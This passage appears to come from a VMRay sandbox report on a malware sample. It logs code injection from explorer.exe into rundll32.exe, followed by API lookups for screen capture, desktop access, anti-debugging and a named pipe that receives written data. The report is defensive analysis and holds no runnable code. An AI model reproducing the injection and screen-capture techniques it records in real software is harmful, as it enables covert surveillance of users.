advapi32.dll 0x75d40000 0x75dbafff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75dc0000 0x75e03fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75f20000 0x76095fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x760a0000 0x760e2fff Memory Mapped File Readable, Writable, Executable False False False -
imagehlp.dll 0x76260000 0x76278fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76280000 0x7630cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x763b0000 0x76441fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x764d0000 0x769acfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x769b0000 0x76afcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76bc0000 0x76caffff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76cb0000 0x76ce5fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x76cf0000 0x76ea9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76eb0000 0x76ebbfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x77050000 0x7705efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77070000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77190000 0x77308fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f540000 0x7f540000 0x7f63ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f640000 0x7f640000 0x7f662fff Pagefile Backed Memory Readable True False False -
private_0x000000007f667000 0x7f667000 0x7f669fff Private Memory Readable, Writable True False False -
private_0x000000007f66a000 0x7f66a000 0x7f66afff Private Memory Readable, Writable True False False -
private_0x000000007f66c000 0x7f66c000 0x7f66efff Private Memory Readable, Writable True False False -
private_0x000000007f66f000 0x7f66f000 0x7f66ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb3d30ffff Private Memory Readable True False False -
pagefile_0x00007dfb3d310000 0x7dfb3d310000 0x7ffb3d30ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb3d4d2000 0x7ffb3d4d2000 0x7ffffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #8: c:\windows\syswow64\explorer.exe 0xc78 address = 0x1c0000, size = 162816 True 1
Fn
Data
Modify Control Flow #8: c:\windows\syswow64\explorer.exe 0xc78 os_tid = 0x60c, address = 0x0 True 1
Fn
Threads
Thread 0x60c
162 0
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76bd9fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x76c00820 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76be6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x76c00ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76bd2db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeA, address_out = 0x76bfdde0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76be5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76be64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76be6170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76bd1b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76bdfc20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76bd79b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76bdf930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c02560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76be2230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76be62a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x771f2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76bd77b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76be57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76be74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76bd8840 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76be3a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76bd9a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76bd9600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76bd25e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x771cda90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76bda3c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76bd9660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76bd7940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771d5e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x771d5e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76bdfbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76bd2da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c028e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76bda2c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76bda790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76bd9950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76bdd940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76bd8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771e9920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76bd8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x771cbae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76bda060 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76bda040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76bd1ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76bd9a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76bd1da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76bd9930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76bd7520 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76bd2af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76bd7560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76be4ca0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76be6390 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76bd9730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsA, address_out = 0x76c00e20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStrings, address_out = 0x76c01090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76bda0f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76bd75a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76bda3b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76bd2dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76bd1d90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76bd2b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76bd9640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76be6860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76be6870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76bdd8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76be6020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76bd9a80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76bd9fc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76bd8770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76bdfd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76bda090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76be6530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76be6910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76be6880 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76be6920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76bd2d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76c026a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x771e4f40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76bde240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76bddb10 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74500000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetProcessWindowStation, address_out = 0x745357a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetThreadDesktop, address_out = 0x74535550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CloseWindowStation, address_out = 0x74535870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetProcessWindowStation, address_out = 0x74534f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenInputDesktop, address_out = 0x74538be0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CloseDesktop, address_out = 0x74535780 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74534dd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x745189f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x74511520 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetThreadDesktop, address_out = 0x74535630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x745155d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetLastInputInfo, address_out = 0x7452d000 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x769b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76a30550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76a30050 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76a2fc80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76a31f90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76a322d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76a30dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectA, address_out = 0x76a40530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76a32170 True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:37:03 (UTC) True 1
Fn
System Get Time type = Ticks, time = 576281 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76bda330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76bd7580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76bd9910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76bdf400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\rundll32.exe, file_name_orig = C:\Windows\syswow64\rundll32.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76bd9680 True 1
Fn
System Get Time type = Ticks, time = 576281 True 1
Fn
File Create Pipe pipe_name = \device\namedpipe\29a7ba79f8, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Fn
System Get Info type = Operating System True 1
Fn
File Write size = 4 True 1
Fn
Data
File Write size = 8192 True 13
Fn
Data
File Write size = 5584 True 1
Fn
Data
System Get Time type = Ticks, time = 577250 True 1
Fn
System Sleep duration = 5000 milliseconds (5.000 seconds) True 1
Fn
System Get Time type = Ticks, time = 582265 True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image